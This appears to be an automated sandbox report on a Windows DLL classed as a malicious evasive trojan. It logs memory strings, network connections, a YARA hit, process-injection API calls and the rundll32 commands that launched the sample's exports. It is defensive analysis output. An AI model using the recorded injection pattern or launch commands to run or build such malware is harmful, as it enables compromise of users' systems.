                  Source: explorer.exe, 0000001E.00000000.1577355235.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2584516696.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/accuweather-el-ni
                  Source: explorer.exe, 0000001E.00000000.1577355235.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2584516696.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/first-map-of-earth-s-lost-continent-has-been-published/
                  Source: explorer.exe, 0000001E.00000000.1577355235.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2584516696.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/stop-planting-new-forests-scientists-say/ar-AA1hFI09
                  Source: explorer.exe, 0000001E.00000000.1577355235.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2584516696.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com:443/en-us/feed
                  Source: explorer.exe, 0000001E.00000000.1577355235.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2584516696.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.stacker.com/arizona/phoenix
                  Source: explorer.exe, 0000001E.00000000.1577355235.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2584516696.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.starsinsider.com/n/154870?utm_source=msn.com&utm_medium=display&utm_campaign=referral_de
                  Source: explorer.exe, 0000001E.00000000.1577355235.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2584516696.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.yelp.com
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
                  Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.9:49773 version: TLS 1.2
                  Source: rundll32.exe, 00000017.00000003.1412218953.0000029F3B8EE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: DirectInput8Creatememstr_81e4c7c7-f
                  Source: rundll32.exe, 00000017.00000003.1412218953.0000029F3B8EE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: GetRawInputDatamemstr_afbc3cd5-b
                  Source: Yara matchFile source: 00000017.00000003.1412218953.0000029F3B8EE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 7656, type: MEMORYSTR
                  Source: C:\Windows\System32\rundll32.exeCode function: 23_3_0000029F3B7DD9FE NtOpenFile,23_3_0000029F3B7DD9FE
                  Source: C:\Windows\System32\rundll32.exeCode function: 23_3_0000029F3B7DDACE NtReadFile,23_3_0000029F3B7DDACE
                  Source: C:\Windows\System32\rundll32.exeCode function: 23_3_0000029F3B7DD98E NtAllocateVirtualMemory,23_3_0000029F3B7DD98E
                  Source: C:\Windows\System32\rundll32.exeCode function: 23_3_0000029F3B7DDA6E NtProtectVirtualMemory,23_3_0000029F3B7DDA6E
                  Source: C:\Windows\System32\rundll32.exeCode function: 23_2_0000029F3B8F7A50 NtSetContextThread,23_2_0000029F3B8F7A50
                  Source: C:\Windows\System32\rundll32.exeCode function: 23_2_0000029F3B8F55C0 NtClose,NtTerminateThread,23_2_0000029F3B8F55C0
                  Source: C:\Windows\System32\rundll32.exeCode function: 23_2_0000029F3B9151C0 NtReadVirtualMemory,23_2_0000029F3B9151C0
                  Source: C:\Windows\System32\rundll32.exeCode function: 23_2_0000029F3B9145F0 NtDuplicateObject,23_2_0000029F3B9145F0
                  Source: C:\Windows\System32\rundll32.exeCode function: 23_2_0000029F3B8E1600 NtClose,RtlExitUserThread,23_2_0000029F3B8E1600
                  Source: C:\Windows\System32\rundll32.exeCode function: 23_2_0000029F3B8F8149 NtSetContextThread,23_2_0000029F3B8F8149
                  Source: C:\Windows\System32\rundll32.exeCode function: 23_2_0000029F3B8E71B0 NtClose,23_2_0000029F3B8E71B0
                  Source: C:\Windows\System32\rundll32.exeCode function: 23_2_0000029F3B8F8C60 NtClose,CreateFiber,DeleteFiber,23_2_0000029F3B8F8C60
                  Source: C:\Windows\System32\rundll32.exeCode function: 23_2_0000029F3B914FF0 NtQueueApcThread,23_2_0000029F3B914FF0
                  Source: C:\Windows\System32\rundll32.exeCode function: 23_2_0000029F3B914BE0 NtProtectVirtualMemory,23_2_0000029F3B914BE0
                  Source: C:\Windows\System32\rundll32.exeCode function: 23_2_0000029F3B913F40 NtAllocateVirtualMemory,23_2_0000029F3B913F40
                  Source: C:\Windows\System32\rundll32.exeCode function: 23_2_0000029F3B914740 NtFreeVirtualMemory,23_2_0000029F3B914740
                  Source: C:\Windows\System32\rundll32.exeCode function: 23_2_0000029F3B914360 NtCreateThreadEx,23_2_0000029F3B914360
                  Source: C:\Windows\System32\rundll32.exeCode function: 23_2_0000029F3B8FF3A0 CreateToolhelp32Snapshot,Thread32First,NtSuspendThread,NtResumeThread,Thread32Next,NtClose,23_2_0000029F3B8FF3A0
                  Source: C:\Windows\System32\rundll32.exeCode function: 23_2_0000029F3B8E17B0 NtClose,23_2_0000029F3B8E17B0
                  Source: C:\Windows\explorer.exeCode function: 30_2_089D82B4 NtFreeVirtualMemory,30_2_089D82B4
                  Source: C:\Windows\explorer.exeCode function: 30_2_089DB388 NtAllocateVirtualMemory,30_2_089DB388
                  Source: C:\Windows\explorer.exeCode function: 30_2_089DC704 NtDelayExecution,30_2_089DC704
                  Source: C:\Windows\explorer.exeCode function: 30_2_089D80B8 RtlInitUnicodeString,NtCreateFile,30_2_089D80B8
                  Source: C:\Windows\explorer.exeCode function: 30_2_089D8240 NtClose,30_2_089D8240
                  Source: C:\Windows\explorer.exeCode function: 30_2_089E01A0 NtFreeVirtualMemory,30_2_089E01A0
                  Source: C:\Windows\explorer.exeCode function: 30_2_089D81C8 NtWriteFile,30_2_089D81C8
                  Source: C:\Windows\explorer.exeCode function: 30_2_089E0130 NtAllocateVirtualMemory,30_2_089E0130
                  Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180041FEC3_2_0000000180041FEC
                  Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001CFF83_2_000000018001CFF8
                  Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018003203C3_2_000000018003203C
                  Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800200443_2_0000000180020044
                  Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018004C0603_2_000000018004C060
                  Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001E0803_2_000000018001E080
                  Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800330883_2_0000000180033088
                  Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001F0D03_2_000000018001F0D0
                  Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001D1043_2_000000018001D104
                  Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018002C1683_2_000000018002C168
                  Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800211883_2_0000000180021188
                  Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800241983_2_0000000180024198
                  Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800221A03_2_00000001800221A0
                  Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800251B03_2_00000001800251B0
                  Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800231B83_2_00000001800231B8
                  Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001F1D83_2_000000018001F1D8
                  Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001E1D83_2_000000018001E1D8
                  Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001D2603_2_000000018001D260
                  Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001E2E03_2_000000018001E2E0
                  Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001F2E03_2_000000018001F2E0
                  Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018003430C3_2_000000018003430C
                  Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001D3643_2_000000018001D364
                  Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800313883_2_0000000180031388
                  Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018002238C3_2_000000018002238C
                  Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018002539C3_2_000000018002539C
                  Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800233A03_2_00000001800233A0
                  Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800123AC3_2_00000001800123AC
                  Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800213B43_2_00000001800213B4
                  Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800243C43_2_00000001800243C4
                  Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001E3E83_2_000000018001E3E8
                  Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018002E4003_2_000000018002E400
                  Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800324083_2_0000000180032408
                  Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001F4483_2_000000018001F448
                  Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001D4903_2_000000018001D490
                  Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018004249C3_2_000000018004249C
                  Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001E4F03_2_000000018001E4F0
                  Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018002C4F83_2_000000018002C4F8
                  Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001C5003_2_000000018001C500
                  Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018004C5103_2_000000018004C510
                  Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001F5503_2_000000018001F550
                  Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018002E5543_2_000000018002E554
                  Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018003356C3_2_000000018003356C
                  Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018002358C3_2_000000018002358C
                  Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001D5983_2_000000018001D598
                  Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018002159C3_2_000000018002159C
                  Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800245AC3_2_00000001800245AC
                  Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800225BC3_2_00000001800225BC
                  Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800255CC3_2_00000001800255CC
                  Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001C6083_2_000000018001C608
                  Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018002B6203_2_000000018002B620
                  Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001F6583_2_000000018001F658
                  Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001E65C3_2_000000018001E65C
                  Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001D6A03_2_000000018001D6A0
                  Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018002E6D03_2_000000018002E6D0
                  Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001C7103_2_000000018001C710
                  Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001F7603_2_000000018001F760
                  Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800217843_2_0000000180021784
                  Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800247943_2_0000000180024794
                  Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001E7A03_2_000000018001E7A0
                  Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800227A83_2_00000001800227A8
                  Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001D7A83_2_000000018001D7A8
                  Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800317BC3_2_00000001800317BC
                  Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800237BC3_2_00000001800237BC
                  Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800327EC3_2_00000001800327EC
                  Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001C81C3_2_000000018001C81C
                  Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018004A8383_2_000000018004A838
                  Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001F8B83_2_000000018001F8B8
                  Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001E8E43_2_000000018001E8E4
                  Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001D9003_2_000000018001D900
                  Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018002C9043_2_000000018002C904
                  Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001C9783_2_000000018001C978
                  Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800229903_2_0000000180022990
                  Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800239A83_2_00000001800239A8
                  Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800219B03_2_00000001800219B0
                  Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018002B9B43_2_000000018002B9B4
                  Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800249C03_2_00000001800249C0
                  Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001F9C03_2_000000018001F9C0
                  Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001DA083_2_000000018001DA08
                  Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001EA283_2_000000018001EA28
                  Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180033A3C3_2_0000000180033A3C
                  Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001CA803_2_000000018001CA80
                  Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001FAC83_2_000000018001FAC8
                  Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001DB103_2_000000018001DB10
                  Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001EB583_2_000000018001EB58
                  Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001CB883_2_000000018001CB88
                  Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180023B943_2_0000000180023B94
                  Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180021B983_2_0000000180021B98
                  Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180024BA83_2_0000000180024BA8
                  Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180032BB83_2_0000000180032BB8
                  Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180022BBC3_2_0000000180022BBC
                  Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001FBD03_2_000000018001FBD0
                  Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180042BFC3_2_0000000180042BFC
                  Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180031C083_2_0000000180031C08
                  Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001DC183_2_000000018001DC18
                  Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001EC603_2_000000018001EC60
                  Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180055C623_2_0000000180055C62
                  Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001CC903_2_000000018001CC90
                  Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180046CAC3_2_0000000180046CAC
                  Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001FD283_2_000000018001FD28
                  Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001ED683_2_000000018001ED68
                  Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001DD703_2_000000018001DD70
                  Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180021D843_2_0000000180021D84
                  Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180024D943_2_0000000180024D94
                  Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180022DA43_2_0000000180022DA4
                  Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180023DC43_2_0000000180023DC4
                  Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018002BDDC3_2_000000018002BDDC
                  Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001CDE83_2_000000018001CDE8
                  Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001FE303_2_000000018001FE30
                  Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001EE703_2_000000018001EE70
                  Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001DE743_2_000000018001DE74
                  Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180033E983_2_0000000180033E98
                  Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001CEF03_2_000000018001CEF0
                  Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180044F383_2_0000000180044F38
                  Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001FF383_2_000000018001FF38
                  Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001DF783_2_000000018001DF78
                  Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180022F8C3_2_0000000180022F8C
                  Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180020FA03_2_0000000180020FA0
                  Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180023FB03_2_0000000180023FB0
                  Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180021FB43_2_0000000180021FB4
                  Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180024FC43_2_0000000180024FC4
                  Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001EFC83_2_000000018001EFC8
                  Source: C:\Windows\System32\rundll32.exeCode function: 23_2_0000029F3B7929EE23_2_0000029F3B7929EE
                  Source: C:\Windows\System32\rundll32.exeCode function: 23_2_0000029F3B7931BE23_2_0000029F3B7931BE
                  Source: C:\Windows\System32\rundll32.exeCode function: 23_2_0000000273F807BE23_2_0000000273F807BE
                  Source: C:\Windows\System32\rundll32.exeCode function: 23_2_0000000273F7FFEE23_2_0000000273F7FFEE
                  Source: C:\Windows\System32\rundll32.exeCode function: 23_2_0000029F3B8F55C023_2_0000029F3B8F55C0
                  Source: C:\Windows\System32\rundll32.exeCode function: 23_2_0000029F3B8F16A023_2_0000029F3B8F16A0
                  Source: C:\Windows\System32\rundll32.exeCode function: 23_2_0000029F3B8F42A023_2_0000029F3B8F42A0
                  Source: C:\Windows\System32\rundll32.exeCode function: 23_2_0000029F3B9082A023_2_0000029F3B9082A0
                  Source: C:\Windows\System32\rundll32.exeCode function: 23_2_0000029F3B8E99D023_2_0000029F3B8E99D0
                  Source: C:\Windows\System32\rundll32.exeCode function: 23_2_0000029F3B90B5E023_2_0000029F3B90B5E0
                  Source: C:\Windows\System32\rundll32.exeCode function: 23_2_0000029F3B9055E023_2_0000029F3B9055E0
                  Source: C:\Windows\System32\rundll32.exeCode function: 23_2_0000029F3B91021023_2_0000029F3B910210
                  Source: C:\Windows\System32\rundll32.exeCode function: 23_2_0000029F3B90722023_2_0000029F3B907220
                  Source: C:\Windows\System32\rundll32.exeCode function: 23_2_0000029F3B90455023_2_0000029F3B904550
                  Source: C:\Windows\System32\rundll32.exeCode function: 23_2_0000029F3B8E5D6023_2_0000029F3B8E5D60
                  Source: C:\Windows\System32\rundll32.exeCode function: 23_2_0000029F3B8F4DB023_2_0000029F3B8F4DB0
                  Source: C:\Windows\System32\rundll32.exeCode function: 23_2_0000029F3B8FB4E023_2_0000029F3B8FB4E0
                  Source: C:\Windows\System32\rundll32.exeCode function: 23_2_0000029F3B8FA10023_2_0000029F3B8FA100
                  Source: C:\Windows\System32\rundll32.exeCode function: 23_2_0000029F3B8E950023_2_0000029F3B8E9500
                  Source: C:\Windows\System32\rundll32.exeCode function: 23_2_0000029F3B8F912023_2_0000029F3B8F9120
                  Source: C:\Windows\System32\rundll32.exeCode function: 23_2_0000029F3B91149023_2_0000029F3B911490
                  Source: C:\Windows\System32\rundll32.exeCode function: 23_2_0000029F3B90FBC023_2_0000029F3B90FBC0
                  Source: C:\Windows\System32\rundll32.exeCode function: 23_2_0000029F3B8FCBE023_2_0000029F3B8FCBE0
                  Source: C:\Windows\System32\rundll32.exeCode function: 23_2_0000029F3B91281223_2_0000029F3B912812
                  Source: C:\Windows\System32\rundll32.exeCode function: 23_2_0000029F3B911F4023_2_0000029F3B911F40
                  Source: C:\Windows\System32\rundll32.exeCode function: 23_2_0000029F3B912F6023_2_0000029F3B912F60
                  Source: C:\Windows\System32\rundll32.exeCode function: 23_2_0000029F3B902BB023_2_0000029F3B902BB0
                  Source: C:\Windows\System32\rundll32.exeCode function: 23_2_0000029F3B9013A323_2_0000029F3B9013A3
                  Source: C:\Windows\System32\rundll32.exeCode function: 23_2_0000029F3B8FBED023_2_0000029F3B8FBED0
                  Source: C:\Windows\System32\rundll32.exeCode function: 23_2_0000029F3B8E66C023_2_0000029F3B8E66C0
                  Source: C:\Windows\System32\rundll32.exeCode function: 23_2_0000029F3B9066E023_2_0000029F3B9066E0
                  Source: C:\Windows\System32\rundll32.exeCode function: 23_2_0000029F3B8EA73023_2_0000029F3B8EA730
                  Source: C:\Windows\explorer.exeCode function: 30_2_089D1A8C30_2_089D1A8C
                  Source: C:\Windows\explorer.exeCode function: 30_2_089D1A7C30_2_089D1A7C
                  Source: C:\Windows\explorer.exeCode function: 30_2_089D216430_2_089D2164
                  Source: C:\Windows\System32\rundll32.exeCode function: String function: 000000018004816C appears 44 times
                  Source: C:\Windows\System32\rundll32.exeCode function: String function: 0000000180001400 appears 56 times
                  Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7148 -s 328
                  Source: classification engineClassification label: mal100.troj.evad.winDLL@28/25@5/3
                  Source: C:\Windows\System32\rundll32.exeCode function: 23_3_00007DF49BA40000 CreateToolhelp32Snapshot,CloseHandle,23_3_00007DF49BA40000
                  Source: C:\Windows\System32\rundll32.exeMutant created: NULL
                  Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7376
                  Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7596
                  Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3648
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3480:120:WilError_03
                  Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7468
                  Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7620
                  Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7148
                  Source: C:\Windows\System32\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\b0d21df3-edb9-4c03-81a1-5896762c4e04Jump to behavior
                  Source: vierm_soft_x64.dll.dllStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: C:\Windows\explorer.exeFile read: C:\Users\desktop.ini
                  Source: C:\Windows\System32\loaddll64.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\vierm_soft_x64.dll.dll,AXA
                  Source: unknownProcess created: C:\Windows\System32\loaddll64.exe loaddll64.exe "C:\Users\user\Desktop\vierm_soft_x64.dll.dll"
                  Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\vierm_soft_x64.dll.dll",#1
                  Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\vierm_soft_x64.dll.dll,AXA
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\vierm_soft_x64.dll.dll",#1
                  Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7148 -s 328
                  Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 3648 -s 316
                  Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\vierm_soft_x64.dll.dll,AXC
                  Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7376 -s 328
                  Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\vierm_soft_x64.dll.dll,AXD
                  Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7468 -s 320
                  Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\vierm_soft_x64.dll.dll",AXA
                  Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\vierm_soft_x64.dll.dll",AXC
                  Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\vierm_soft_x64.dll.dll",AXD
                  Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\vierm_soft_x64.dll.dll",AXS
                  Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\vierm_soft_x64.dll.dll",GetDeepDVCState
                  Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7596 -s 324
                  Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7620 -s 320
                  Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\vierm_soft_x64.dll.dll",#1Jump to behavior
                  Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\vierm_soft_x64.dll.dll,AXAJump to behavior
                  Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\vierm_soft_x64.dll.dll,AXCJump to behavior
                  Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\vierm_soft_x64.dll.dll,AXDJump to behavior
